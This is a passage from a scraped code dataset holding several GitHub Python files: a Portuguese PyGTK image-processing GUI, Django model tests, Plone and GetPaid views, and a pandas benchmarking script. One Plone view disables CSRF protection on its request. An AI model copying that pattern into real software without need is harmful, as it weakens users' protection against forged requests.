gui.get_widget(\"op_arit_radiobutton_subtracao\")\n self.rbOpAritmeticaMultiplicacao = gui.get_widget(\"op_arit_radiobutton_multiplicacao\")\n \n \n #Controles da aba OPERACOES 
LOGICAS\n self.fcOpLogicaOrigem1 = gui.get_widget(\"op_log_filechooserbutton1\")\n self.fcOpLogicaOrigem2 = gui.get_widget(\"op_log_filechooserbutton2\")\n self.fcOpLogicaDestino = gui.get_widget(\"op_log_filechooserbutton_destino\")\n self.btOpLogicaExecutar = gui.get_widget(\"op_log_button_executar\")\n self.btOpLogicaSalvar = gui.get_widget(\"op_log_button_salvar\")\n self.rbOpLogicaAnd = gui.get_widget(\"op_log_radiobutton_and\")\n self.rbOpLogicaOr = gui.get_widget(\"op_log_radiobutton_or\")\n self.rbOpLogicaXor = gui.get_widget(\"op_log_radiobutton_xor\")\n \n \n #Controles da aba FILTROS DINAMICOS\n self.fcFiltroDinOrigem = gui.get_widget(\"filtro_din_filechooserbutton_origem\")\n self.fcFiltroDinDestino = gui.get_widget(\"filtro_din_filechooserbutton_destino\")\n self.rbFiltroDinPassaAlta = gui.get_widget(\"filtro_din_radiobutton_passa_alta\")\n self.rbFiltroDinMedia = gui.get_widget(\"filtro_din_radiobutton_media\")\n self.rbFiltroDinMediana = gui.get_widget(\"filtro_din_radiobutton_mediana\")\n self.rbFiltroDinHighBoost = gui.get_widget(\"filtro_din_radiobutton_highboost\")\n self.cbFiltroDin = gui.get_widget(\"filtro_din_combobox\")\n self.sbFiltroDin = gui.get_widget(\"filtro_din_spinbutton\")\n self.btFiltroDinExecutar = gui.get_widget(\"filtro_din_button_executar\")\n self.btFiltroDinSalvar = gui.get_widget(\"filtro_din_button_salvar\")\n \n \n #Controles da aba FILTROS\n self.fcFiltroOrigem = gui.get_widget(\"filtro_filechooserbutton_origem\")\n self.fcFiltroDestino = gui.get_widget(\"filtro_filechooserbutton_destino\")\n self.fcFiltroDestino_h = gui.get_widget(\"filtro_filechooserbutton_destino_h\")\n self.fcFiltroDestino_v = gui.get_widget(\"filtro_filechooserbutton_destino_v\")\n self.rbFiltroSobel = gui.get_widget(\"filtro_radiobutton_sobel\")\n self.rbFiltroRoberts = gui.get_widget(\"filtro_radiobutton_roberts\")\n self.rbFiltroPrewitt = gui.get_widget(\"filtro_radiobutton_prewitt\")\n self.btFiltroExecutar = gui.get_widget(\"filtro_button_executar\")\n self.btFiltroSalvar = gui.get_widget(\"filtro_button_salvar\")\n self.btFiltroSalvar_h = gui.get_widget(\"filtro_button_salvar_h\")\n self.btFiltroSalvar_v = gui.get_widget(\"filtro_button_salvar_v\")\n\n\n #Controles da aba OUTROS\n self.fcOutrosOrigem = gui.get_widget(\"out_filechooserbutton_origem\")\n self.fcOutrosDestino = gui.get_widget(\"out_filechooserbutton_destino\")\n self.btOutrosSalvar = gui.get_widget(\"out_button_salvar\")\n self.rbOutrosCrescimento = gui.get_widget(\"out_radiobutton_crescimento\")\n self.rbOutrosDeteccao = gui.get_widget(\"out_radiobutton_deteccao\")\n self.evOutros = gui.get_widget(\"out_eventos\")\n self.hsOutros = gui.get_widget(\"out_hscale\")\n self.txtOutrosVizinhos = gui.get_widget(\"out_txt_visitados\")\n \n \n \n #Associa os eventos aos controles\n \n #Eventos do menu\n self.btSair.connect(\"activate\", self.actSair)\n self.btSobre.connect(\"activate\", self.actSobre)\n \n \n #Eventos da aba ESCALA DE CINZA\n self.fcEscalaOrigem.connect(\"file-set\", self.actEscalaCinzaCarregaImagem)\n self.btEscalaExecutar.connect(\"clicked\", self.actEscalaCinzaExecutar)\n self.btEscalaSalvar.connect(\"clicked\", self.actEscalaCinzaSalvar)\n \n \n #Eventos da aba HISTOGRAMA\n self.fcHistogramaOrigem.connect(\"file-set\", self.actHistogramaCarregaImagem)\n self.btHistogramaExecutar.connect(\"clicked\", self.actHistogramaExecutar)\n \n \n #Eventos da aba LIMIARIZACAO\n self.fcLimiarizacaoOrigem.connect(\"file-set\", self.actLimiarizacaoCarregaImagem)\n 
self.btLimiarizacaoSalvar.connect(\"clicked\", self.actLimiarizacaoSalvar)\n self.evLimiarizacao.connect(\"button-press-event\", self.actLimiarizacaoPreencherRgb)\n self.hsLimiarizacao.connect(\"button-release-event\", self.actLimiarizacaoExecutar)\n \n \n #Eventos da aba OPERACOES ARITMETICAS\n self.fcOpAritmeticaOrigem1.connect(\"file-set\", self.actOpAritmeticaCarregaImagem1)\n self.fcOpAritmeticaOrigem2.connect(\"file-set\", self.actOpAritmeticaCarregaImagem2)\n self.btOpAritmeticaExecutar.connect(\"clicked\", self.actOpAritmeticaExecutar)\n self.btOpAritmeticaSalvar.connect(\"clicked\", self.actOpAritmeticaSalvar)\n \n \n #Eventos da aba OPERACOES LOGICAS\n self.fcOpLogicaOrigem1.connect(\"file-set\", self.actOpLogicaCarregaImagem1)\n self.fcOpLogicaOrigem2.connect(\"file-set\", self.actOpLogicaCarregaImagem2)\n self.btOpLogicaExecutar.connect(\"clicked\", self.actOpLogicaExecutar)\n self.btOpLogicaSalvar.connect(\"clicked\", self.actOpLogicaSalvar)\n \n \n #Eventos da aba FILTROS DINAMICOS\n self.fcFiltroDinOrigem.connect(\"file-set\", self.actFiltroDinCarregaImagem)\n self.btFiltroDinExecutar.connect(\"clicked\", self.actFiltroDinExecutar)\n self.btFiltroDinSalvar.connect(\"clicked\", self.actFiltroDinSalvar)\n \n \n #Eventos da aba FILTROS\n self.fcFiltroOrigem.connect(\"file-set\", self.actFiltroCarregaImagem)\n self.btFiltroExecutar.connect(\"clicked\", self.actFiltroExecutar)\n self.btFiltroSalvar.connect(\"clicked\", self.actFiltroSalvar)\n self.btFiltroSalvar_h.connect(\"clicked\", self.actFiltroSalvarHorizontal)\n self.btFiltroSalvar_v.connect(\"clicked\", self.actFiltroSalvarVertical)\n \n \n #Eventos da aba OUTROS\n self.fcOutrosOrigem.connect(\"file-set\", self.actOutrosCarregaImagem)\n self.btOutrosSalvar.connect(\"clicked\", self.actOutrosSalvar)\n self.evOutros.connect(\"button-press-event\", self.actOutrosPreencherPosicaoPixel)\n self.hsOutros.connect(\"button-release-event\", self.actOutrosExecutar)\n \n \n self.main_window.show_all()\n self.loop()\n\n\n #Metodo da GTK\n def loop(self):\n gtk.main()\n\n\n #Metodo que fecha o programa\n def actSair(self, widget):\n gtk.main_quit()\n \n \n #Metodo que abre a janela Sobre\n def actSobre(self, widget):\n Sobre()\n \n \n \n #Metodos de ESCALA DE CINZA\n \n #Metodo que carrega a imagem no widget de escala de cinza\n def actEscalaCinzaCarregaImagem(self, widget):\n imagem = self.gui.get_widget('escala_image_origem')\n imagem.set_from_file(self.fcEscalaOrigem.get_filename())\n imagem.show()\n\n\n #Metodo que gera a imagem em escala de cinza\n def actEscalaCinzaExecutar(self, widget):\n imageManager = ImageManager()\n imageManager.escala_cinza(self.fcEscalaOrigem.get_filename())\n imagem = self.gui.get_widget('escala_image_gerada')\n imagem.set_from_file(\"../img/modificada_escala_cinza.png\")\n imagem.show()\n \n \n #Metodo que salva a imagem em escala de cinza\n def actEscalaCinzaSalvar(self, widget):\n img = Image.open(\"../img/modificada_escala_cinza.png\")\n file = self.fcEscalaOrigem.get_filename().split(\"/\")\n img.save(self.fcEscalaDestino.get_filename() + \"/escala-cinza-\" + file[len(file) - 1])\n\n\n\n #Metodos de HISTOGRAMAS\n \n #Metodo que carrega a imagem no widget de histograma\n def actHistogramaCarregaImagem(self, widget):\n imagem = self.gui.get_widget('hist_image_origem')\n imagem.set_from_file(self.fcHistogramaOrigem.get_filename())\n imagem.show()\n\n\n #Metodo que gera os histogramas\n def actHistogramaExecutar(self, widget):\n imageManager = ImageManager()\n #Gera histograma escala de cinza\n 
imageManager.escala_cinza(self.fcHistogramaOrigem.get_filename())\n imageManager.histograma_escala_cinza(\"../img/modificada_escala_cinza.png\")\n imageManager.histograma_rgb(self.fcHistogramaOrigem.get_filename())\n imagem = self.gui.get_widget('hist_image_cinza')\n imagem.set_from_file(\"../img/histograma_escala_cinza.png\")\n imagem.show()\n #Gera histograma banda red\n imagem = self.gui.get_widget('hist_image_r')\n imagem.set_from_file(\"../img/histograma_red.png\")\n imagem.show()\n #Gera histograma banda green\n imagem = self.gui.get_widget('hist_image_g')\n imagem.set_from_file(\"../img/histograma_green.png\")\n imagem.show()\n #Gera histograma banda blue\n imagem = self.gui.get_widget('hist_image_b')\n imagem.set_from_file(\"../img/histograma_blue.png\")\n imagem.show()\n\n\n\n #Metodos de LIMIARIZACAO\n \n #Metodo que carrega a imagem no widget de limiarizacao\n def actLimiarizacaoCarregaImagem(self, widget):\n imagem = self.gui.get_widget('lim_image_origem')\n imagem.set_from_file(self.fcLimiarizacaoOrigem.get_filename())\n imagem.show()\n \n #Metodo que preenche o valor RGB do pixel clicado na imagem\n def actLimiarizacaoPreencherRgb(self, widget, event):\n img = Image.open(self.fcLimiarizacaoOrigem.get_filename())\n img.load()\n \n #Efetua os calculos do ponto X e Y clicado na tela\n if (img.size[0] < 610 and img.size[1] < 481) :\n pixel_x = event.get_coords()[0] - int((625 - img.size[0]) / 2)\n pixel_y = event.get_coords()[1] - int((480 - img.size[1]) / 2)\n elif (img.size[0] < 610) :\n pixel_x = event.get_coords()[0] - int((625 - img.size[0]) / 2)\n pixel_y = event.get_coords()[1]\n elif (img.size[1] < 481) :\n pixel_x = event.get_coords()[0]\n pixel_y = event.get_coords()[1] - int((480 - img.size[1]) / 2)\n else :\n pixel_x = event.get_coords()[0]\n pixel_y = event.get_coords()[1]\n \n if (pixel_x > 0 and pixel_x < img.size[0] and pixel_y > 0 and pixel_y < img.size[1]) :\n pixel = img.getpixel((pixel_x, pixel_y))\n try :\n self.txtLimiarizacaoR.set_text(str(pixel[0]))\n self.txtLimiarizacaoG.set_text(str(pixel[1]))\n self.txtLimiarizacaoB.set_text(str(pixel[2]))\n except : \n self.txtLimiarizacaoR.set_text(str(pixel))\n self.txtLimiarizacaoG.set_text(str(pixel))\n self.txtLimiarizacaoB.set_text(str(pixel))\n \n #Metodo que gera a imagem limiarizada\n def actLimiarizacaoExecutar(self, widget, arg):\n imageManager = ImageManager()\n #Caso a opcao seJA GLOBAL SIMPLES\n if (self.rbLimiarizacaoGlobal.get_active()):\n imageManager.limiarizacao_global_simples(self.fcLimiarizacaoOrigem.get_filename(), self.hsLimiarizacao.get_value())\n #Caso a opcao seja DIVERSAS VARIAVEIS\n else:\n imageManager.limiarizacao_diversas_variaveis(self.fcLimiarizacaoOrigem.get_filename(), self.hsLimiarizacao.get_value(), [int(self.txtLimiarizacaoR.get_text()), int(self.txtLimiarizacaoG.get_text()), int(self.txtLimiarizacaoB.get_text())])\n \n imagem = self.gui.get_widget('lim_image_gerada')\n imagem.set_from_file(\"../img/modificada_limiarizacao.png\")\n imagem.show()\n \n \n #Metodo que salva a imagem limiarizada\n def actLimiarizacaoSalvar(self, widget):\n img = Image.open(\"../img/modificada_limiarizacao.png\")\n file = self.fcLimiarizacaoOrigem.get_filename().split(\"/\")\n img.save(self.fcLimiarizacaoDestino.get_filename() + \"/limiarizacao-\" + file[len(file) - 1])\n \n\n\n #Metodos de OPERACOES ARITMETICAS\n \n #Metodo que carrega a imagem no widget de operacoes aritmeticas\n def actOpAritmeticaCarregaImagem1(self, widget):\n imagem = self.gui.get_widget('op_arit_image1')\n 
imagem.set_from_file(self.fcOpAritmeticaOrigem1.get_filename())\n imagem.show()\n \n \n #Metodo que carrega a imagem no widget de operacoes aritmeticas\n def actOpAritmeticaCarregaImagem2(self, widget):\n imagem = self.gui.get_widget('op_arit_image2')\n imagem.set_from_file(self.fcOpAritmeticaOrigem2.get_filename())\n imagem.show()\n\n\n #Metodo que gera a imagem apos ser executado a operacao aritmetica\n def actOpAritmeticaExecutar(self, widget):\n imageManager = ImageManager()\n #Caso a operacao seja de ADICAO\n if (self.rbOpAritmeticaAdicao.get_active()):\n imageManager.operacao_aritmetica_adicao_reescalonamento(self.fcOpAritmeticaOrigem1.get_filename(), self.fcOpAritmeticaOrigem2.get_filename())\n else:\n #Caso a operacao seja de SUBTRACAO\n if (self.rbOpAritmeticaSubtracao.get_active()):\n imageManager.operacao_aritmetica_subtracao(self.fcOpAritmeticaOrigem1.get_filename(), self.fcOpAritmeticaOrigem2.get_filename())\n #Caso a operacao seja de MULTIPLICACAO\n else:\n imageManager.operacao_aritmetica_multiplicacao(self.fcOpAritmeticaOrigem1.get_filename(), self.fcOpAritmeticaOrigem2.get_filename())\n \n imagem = self.gui.get_widget('op_arit_imagem_gerada')\n imagem.set_from_file(\"../img/modificada_operacao_aritmetica.png\")\n imagem.show()\n \n \n #Metodo que salva a imagem apos ser executado a operacao aritmetica\n def actOpAritmeticaSalvar(self, widget):\n img = Image.open(\"../img/modificada_operacao_aritmetica.png\")\n file = self.fcOpAritmeticaOrigem1.get_filename().split(\"/\")\n img.save(self.fcOpAritmeticaDestino.get_filename() + \"/operacao-aritmetica-\" + file[len(file) - 1])\n \n \n \n #Metodos de OPERACOES LOGICAS\n \n #Metodo que carrega a imagem no widget de operacoes logicas\n def actOpLogicaCarregaImagem1(self, widget):\n imagem = self.gui.get_widget('op_log_image1')\n imagem.set_from_file(self.fcOpLogicaOrigem1.get_filename())\n imagem.show()\n \n \n #Metodo que carrega a imagem no widget de operacoes logicas\n def actOpLogicaCarregaImagem2(self, widget):\n imagem = self.gui.get_widget('op_log_image2')\n imagem.set_from_file(self.fcOpLogicaOrigem2.get_filename())\n imagem.show()\n\n\n #Metodo que gera a imagem apos ser executado a operacao logicas\n def actOpLogicaExecutar(self, widget):\n imageManager = ImageManager()\n #Caso a operacao seja de AND\n if (self.rbOpLogicaAnd.get_active()):\n imageManager.operacao_logica_and(self.fcOpLogicaOrigem1.get_filename(), self.fcOpLogicaOrigem2.get_filename())\n else:\n #Caso a operacao seja de OR\n if (self.rbOpLogicaOr.get_active()):\n imageManager.operacao_logica_or(self.fcOpLogicaOrigem1.get_filename(), self.fcOpLogicaOrigem2.get_filename())\n #Caso a operacao seja de XOR\n else:\n imageManager.operacao_logica_xor(self.fcOpLogicaOrigem1.get_filename(), self.fcOpLogicaOrigem2.get_filename())\n \n imagem = self.gui.get_widget('op_log_imagem_gerada')\n imagem.set_from_file(\"../img/modificada_operacao_logica.png\")\n imagem.show()\n \n \n #Metodo que salva a imagem apos ser executado a operacao logicas\n def actOpLogicaSalvar(self, widget):\n img = Image.open(\"../img/modificada_operacao_logica.png\")\n file = self.fcOpLogicaOrigem1.get_filename().split(\"/\")\n img.save(self.fcOpLogicaDestino.get_filename() + \"/operacao-logica-\" + file[len(file) - 1])\n\n\n\n #Metodos de FILTROS DINAMICOS\n \n #Metodo que carrega a imagem no widget de filtro\n def actFiltroDinCarregaImagem(self, widget):\n imagem = self.gui.get_widget('filtro_din_image_origem')\n imagem.set_from_file(self.fcFiltroDinOrigem.get_filename())\n 
imagem.show()\n\n\n #Metodo que gera a imagem filtrada\n def actFiltroDinExecutar(self, widget):\n imageManager = ImageManager()\n index = self.cbFiltroDin.get_active()\n \n #Verifica qual sera o tamanho da mascara\n if (index == 2) :\n tamanho_matriz = 7\n elif (index == 1) :\n tamanho_matriz = 5\n else :\n tamanho_matriz = 3\n\n if (self.rbFiltroDinPassaAlta.get_active()):\n imageManager.filtro_passa_alta_basico(self.fcFiltroDinOrigem.get_filename(), tamanho_matriz)\n elif (self.rbFiltroDinMedia.get_active()):\n imageManager.filtro_media(self.fcFiltroDinOrigem.get_filename(), tamanho_matriz)\n elif (self.rbFiltroDinMediana.get_active()):\n imageManager.filtro_mediana(self.fcFiltroDinOrigem.get_filename(), tamanho_matriz)\n else :\n valor_a = self.sbFiltroDin.get_value()\n imageManager.filtro_high_boost(self.fcFiltroDinOrigem.get_filename(), tamanho_matriz, valor_a)\n \n imagem = self.gui.get_widget('filtro_din_image_gerada')\n imagem.set_from_file(\"../img/modificada_filtro.png\")\n imagem.show()\n \n \n #Metodo que salva a imagem filtrada\n def actFiltroDinSalvar(self, widget):\n img = Image.open(\"../img/modificada_filtro.png\")\n file = self.fcFiltroDinOrigem.get_filename().split(\"/\")\n img.save(self.fcFiltroDinDestino.get_filename() + \"/filtro-\" + file[len(file) - 1])\n\n\n\n #Metodos de FILTROS \n \n #Metodo que carrega a imagem no widget de filtro\n def actFiltroCarregaImagem(self, widget):\n imagem = self.gui.get_widget('filtro_image_origem')\n imagem.set_from_file(self.fcFiltroOrigem.get_filename())\n imagem.show()\n\n\n #Metodo que gera a imagem filtrada\n def actFiltroExecutar(self, widget):\n imageManager = ImageManager()\n\n if (self.rbFiltroSobel.get_active()):\n imageManager.filtro_sobel(self.fcFiltroOrigem.get_filename())\n elif (self.rbFiltroRoberts.get_active()):\n imageManager.filtro_roberts(self.fcFiltroOrigem.get_filename())\n else :\n imageManager.filtro_prewitt(self.fcFiltroOrigem.get_filename())\n \n imagem = self.gui.get_widget('filtro_image_gerada')\n imagem.set_from_file(\"../img/modificada_filtro.png\")\n imagem.show()\n imagem_h = self.gui.get_widget('filtro_image_gerada_h')\n imagem_h.set_from_file(\"../img/modificada_filtro_h.png\")\n imagem_h.show()\n imagem_v = self.gui.get_widget('filtro_image_gerada_v')\n imagem_v.set_from_file(\"../img/modificada_filtro_v.png\")\n imagem_v.show()\n \n \n #Metodo que salva a imagem filtrada\n def actFiltroSalvar(self, widget):\n img = Image.open(\"../img/modificada_filtro.png\")\n file = self.fcFiltroOrigem.get_filename().split(\"/\")\n img.save(self.fcFiltroDestino.get_filename() + \"/filtro-\" + file[len(file) - 1])\n\n\n #Metodo que salva a imagem filtrada\n def actFiltroSalvarHorizontal(self, widget):\n img = Image.open(\"../img/modificada_filtro_h.png\")\n file = self.fcFiltroOrigem.get_filename().split(\"/\")\n img.save(self.fcFiltroDestino_h.get_filename() + \"/filtro_h-\" + file[len(file) - 1])\n\n\n #Metodo que salva a imagem filtrada\n def actFiltroSalvarVertical(self, widget):\n img = Image.open(\"../img/modificada_filtro_v.png\")\n file = self.fcFiltroOrigem.get_filename().split(\"/\")\n img.save(self.fcFiltroDestino_v.get_filename() + \"/filtro_v-\" + file[len(file) - 1])\n \n \n \n #Metodos de OUTROS\n \n #Metodo que carrega a imagem no widget de outros\n def actOutrosCarregaImagem(self, widget):\n imagem = self.gui.get_widget('out_image_origem')\n imagem.set_from_file(self.fcOutrosOrigem.get_filename())\n imagem.show()\n \n #Metodo que preenche a posicao do pixel clicado na imagem\n def 
actOutrosPreencherPosicaoPixel(self, widget, event):\n img = Image.open(self.fcOutrosOrigem.get_filename())\n img.load()\n \n if (img.size[0] < 610 and img.size[1] < 481) :\n pixel_x = event.get_coords()[0] - int((625 - img.size[0]) / 2)\n pixel_y = event.get_coords()[1] - int((480 - img.size[1]) / 2)\n elif (img.size[0] < 610) :\n pixel_x = event.get_coords()[0] - int((625 - img.size[0]) / 2)\n pixel_y = event.get_coords()[1]\n elif (img.size[1] < 481) :\n pixel_x = event.get_coords()[0]\n pixel_y = event.get_coords()[1] - int((480 - img.size[1]) / 2)\n else :\n pixel_x = event.get_coords()[0]\n pixel_y = event.get_coords()[1]\n \n self.pixel_x = pixel_x\n self.pixel_y = pixel_y\n \n \n #Metodo que gera a imagem outros\n def actOutrosExecutar(self, widget, arg):\n imageManager = ImageManager()\n #Caso a opcao seja CRESCIMENTO DE REGIOES\n if (self.rbOutrosCrescimento.get_active()):\n self.txtOutrosVizinhos.set_text(imageManager.outros_crescimento_regioes(self.fcOutrosOrigem.get_filename(), self.hsOutros.get_value(), [int(self.pixel_x), int(self.pixel_y)]))\n #Caso a opcao seja DETECCAO DE BORDAS\n else:\n imageManager.outros_deteccao_de_bordas(self.fcOutrosOrigem.get_filename(), self.hsOutros.get_value())\n \n imagem = self.gui.get_widget('out_image_gerada')\n imagem.set_from_file(\"../img/modificada_outros.png\")\n imagem.show()\n \n \n #Metodo que salva a imagem limiarizada\n def actOutrosSalvar(self, widget):\n img = Image.open(\"../img/modificada_outros.png\")\n file = self.fcOutrosOrigem.get_filename().split(\"/\")\n img.save(self.fcOutrosDestino.get_filename() + \"/outros-\" + file[len(file) - 1])\n \n \n \n#Classe que gerencia a janela Sobre\nclass Sobre():\n \n \n #Construtor da classe\n def __init__(self):\n \n #Nome do arquivo Glade\n self.__glade_file_sobre = \"../xml/sobre.glade\"\n gui_sobre = gtk.glade.XML(self.__glade_file_sobre)\n self.gui_sobre = gui_sobre\n \n self.sobre_window = gui_sobre.get_widget(\"janela_sobre\")\n self.sobre_window.connect(\"destroy\", gtk.main_quit)\n \n gui_sobre.get_widget(\"sobre_fechar\").connect(\"clicked\", self.sair)\n \n self.sobre_window.show_all()\n self.loop()\n \n \n #Metodo que fecha o programa\n def sair(self, widget):\n self.sobre_window.destroy()\n \n \n #Metodo da GTK\n def loop(self):\n gtk.main()","repo_name":"cadicallegari/gipi","sub_path":"PI_TRABALHO_1/src/Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":25331,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8408575254","text":"from django.test import TestCase\n\nfrom ..models import Endereco, Pedido, Produto, User\nfrom ..utils import gerar_id\n\n\nclass UserTestCase(TestCase):\n @classmethod\n def setUpTestData(cls):\n User.objects.create(\n username='joaobobo123',\n email='jbobo123@yopmail.com',\n first_name='joão',\n last_name='bobo',\n cpf='11122233344',\n password='foo'\n )\n\n User.objects.create(\n username='adminbolado',\n email='admbolado123@yopmail.com',\n first_name='admin',\n last_name='bolado',\n password='bar',\n is_superuser=True\n )\n\n def test_user_str(self):\n user_normal = User.objects.get(email='jbobo123@yopmail.com')\n self.assertEqual(user_normal.__str__(), 'João Bobo')\n\n def test_superuser(self):\n super_user = User.objects.get(email='admbolado123@yopmail.com')\n self.assertTrue(super_user.is_superuser)\n\n\nclass ProdutoTestCase(TestCase):\n @classmethod\n def setUpTestData(cls):\n Produto.objects.create( # slug automático\n nome='Super Mario Odyssey',\n 
preco=197.875,\n score=100,\n )\n\n Produto.objects.create( # jogo com slug personalizado\n nome='Call Of Duty Infinite Warfare',\n preco=49.99,\n score=80,\n slug='cod-iw-ps4',\n )\n\n def test_slug_produto(self):\n p1 = Produto.objects.get(nome='Super Mario Odyssey')\n p2 = Produto.objects.get(nome='Call Of Duty Infinite Warfare')\n\n self.assertEqual(p1.slug, 'super-mario-odyssey')\n self.assertEqual(p2.slug, 'cod-iw-ps4')\n\n def test_preco_round(self):\n p1 = Produto.objects.get(nome='Super Mario Odyssey')\n\n self.assertEqual(p1.preco, 197.88)\n\n\nclass PedidoTestCase(TestCase):\n @classmethod\n def setUpTestData(cls):\n joao_bobo = User.objects.create(\n username='joaobobo123',\n email='jbobo123@yopmail.com',\n first_name='joão',\n last_name='bobo',\n password='foo'\n )\n\n # pedido de três produtos com subtotal de 197.88: o total deve ser 227.88\n Pedido.objects.create(\n subtotal=197.88,\n id_pedido=gerar_id(12),\n cliente=joao_bobo,\n quantidade=3\n )\n\n # pedido de cinco produtos com subtotal de 250: o total deve ser 250\n Pedido.objects.create(\n id_pedido=gerar_id(12),\n subtotal=250,\n cliente=joao_bobo,\n quantidade=5\n )\n\n def test_total(self):\n p1 = Pedido.objects.get(subtotal=197.88)\n p2 = Pedido.objects.get(subtotal=250)\n\n self.assertEqual(p1.total, 227.88)\n self.assertEqual(p2.total, 250)\n\n\nclass EnderecoTestCase(TestCase): # ok\n @classmethod\n def setUpTestData(cls):\n joao_bobo = User.objects.create(\n username='joaobobo123',\n email='jbobo123@yopmail.com',\n first_name='joão',\n last_name='bobo',\n password='foo'\n )\n\n Endereco.objects.create(\n cliente=joao_bobo,\n nome=joao_bobo.get_full_name(),\n cep='11111111',\n rua='Rua dos Bobos',\n residencia='0',\n bairro='Fictício',\n cidade='Bobolândia',\n estado='Fictício',\n )\n\n def test_endereco(self):\n e1 = Endereco.objects.get(rua='Rua dos Bobos')\n\n self.assertEqual(e1.nome, 'joão bobo')\n","repo_name":"and3rcg/ps-supera-backend","sub_path":"api/tests/tests_models.py","file_name":"tests_models.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70307170706","text":"# -*- coding: utf-8 -*-\n\nfrom plone.app.contenttypes.browser.collection import CollectionView\nfrom plone.protect.interfaces import IDisableCSRFProtection\nfrom zope.interface import alsoProvides\nimport logging\n\n\nlogger = logging.getLogger('collective.abctune:tunesListCollection ')\n\n\nclass tunesListCollection(CollectionView):\n \"\"\"\n code from plone.app.contenttypes.browser.collection.CollectionView\n \"\"\"\n \"\"\"\n def __call__(self):\n alsoProvides(self.request, IDisableCSRFProtection)\n \"\"\"\n\n def results(self, **kwargs):\n \"\"\"Return a content listing based result set with results from the\n collection query.\n\n :param **kwargs: Any keyword argument, which can be used for catalog\n queries.\n :type **kwargs: keyword argument\n\n :returns: plone.app.contentlisting based result set.\n :rtype: ``plone.app.contentlisting.interfaces.IContentListing`` based\n sequence.\n \"\"\"\n alsoProvides(self.request, IDisableCSRFProtection)\n # Extra filter\n contentFilter = self.request.get('contentFilter', {})\n contentFilter.update(kwargs.get('contentFilter', {}))\n kwargs.setdefault('custom_query', contentFilter)\n kwargs.setdefault('batch', True)\n kwargs.setdefault('b_size', self.b_size)\n kwargs.setdefault('b_start', self.b_start)\n\n results = self.collection_behavior.results(**kwargs)\n # here, we return a list of 
objects.\n return [obj.getObject() for obj in results]\n","repo_name":"erichardy/collective.abctune","sub_path":"src/collective/abctune/browser/tunes_list_collection.py","file_name":"tunes_list_collection.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"33948936340","text":"from Products.Five import BrowserView\nfrom collective.beaker.interfaces import ISession\nfrom getpaid.core.interfaces import IOrderManager\nfrom zope.component import getUtility\n\n\nclass OrderConfirmationView(BrowserView):\n \n def __call__(self):\n session = ISession(self.request)\n order_id = session.get('groundwire.checkout.order_id', None)\n if order_id is not None:\n order_manager = getUtility(IOrderManager)\n order = order_manager.get(order_id)\n self.cart = order.shopping_cart\n if 'getpaid.processor.uid' in order.__annotations__:\n self.txn_id = order.__annotations__['getpaid.processor.uid']\n else:\n self.txn_id = None\n \n del session['groundwire.checkout.order_id']\n session.save()\n return self.index()\n","repo_name":"collective/groundwire.checkout","sub_path":"groundwire/checkout/browser/confirmation.py","file_name":"confirmation.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"6033119645","text":"\"\"\"\nConvert a dataframe into a triply nested dict using three different approaches; the approach that avoids the dataframe entirely and processes plain dicts takes the least time by far.\nmethod 1 -- sum of time: 7.329394340515137\nmethod 2 -- sum of time: 1.2476661205291748\nmethod 3 -- sum of time: 0.05086255073547363\n\"\"\"\nimport pickle\nimport pandas as pd\nimport json\nimport time\n\n\nif __name__ == \"__main__\":\n start = time.time()\n data_dict = {}\n # df = pickle.load(open(\"d:/download/data_df.pkl\", \"rb\"))\n df = pd.read_pickle(r\"d:/download/data_df.pkl\")\n grouped = df.groupby(\"S_INFO_WINDCODE\")\n for name, group in grouped:\n time_dict = {}\n group = group.sort_values(by=\"EX_DATE\") # keep the sorted result; the original call discarded it\n for _, row in group.iterrows():\n element_dict = dict(row)\n del element_dict[\"S_INFO_WINDCODE\"]\n del element_dict[\"EX_DATE\"]\n time_dict[str(row[\"EX_DATE\"])] = element_dict\n data_dict[name] = time_dict\n end = time.time()\n print(\"method 1 -- sum of time: \", end - start)\n print(\"method 1 -- data_dict size {0}\".format(len(data_dict)))\n # json.dump(data_dict, open(\"d:/download/my_data_dict.json\", \"w\"), indent=4, ensure_ascii=False)\n\n start = time.time()\n data_df = pd.read_pickle(r'd:/download/data_df.pkl')\n data_df = data_df.fillna(0)\n data_dict = {}\n for name, group in data_df.groupby('S_INFO_WINDCODE'):\n v_dict = {}\n for vv in group.values:\n v_dict[vv[1]] = {\n 'CASH_DIVIDEND_RATIO': vv[2],\n 'BONUS_SHARE_RATIO': vv[3],\n 'RIGHTSISSUE_RATIO': vv[4],\n 'RIGHTSISSUE_PRICE': vv[5],\n 'CONVERSED_RATIO': vv[6]\n }\n data_dict[name] = v_dict\n end = time.time()\n print(\"method 2 -- sum of time: \", end - start)\n print(\"method 2 -- data_dict size {0}\".format(len(data_dict)))\n\n start = time.time()\n data = pd.read_pickle(r'd:/download/data_list.pkl')\n ssym = ''\n data_dict = {}\n cur_dict = {}\n for datal in data:\n if ssym != datal[0]:\n if ssym not in data_dict.keys():\n data_dict[datal[0]] = {}\n else:\n data_dict[ssym] = cur_dict\n data_dict[datal[0]] = {}\n cur_dict = {}\n ssym = datal[0]\n\n cur_dict[datal[1]] = {\n 'CASH_DIVIDEND_RATIO': datal[2],\n 'BONUS_SHARE_RATIO': datal[3],\n 'RIGHTSISSUE_RATIO': datal[4],\n 'RIGHTSISSUE_PRICE': datal[5],\n 'CONVERSED_RATIO': 
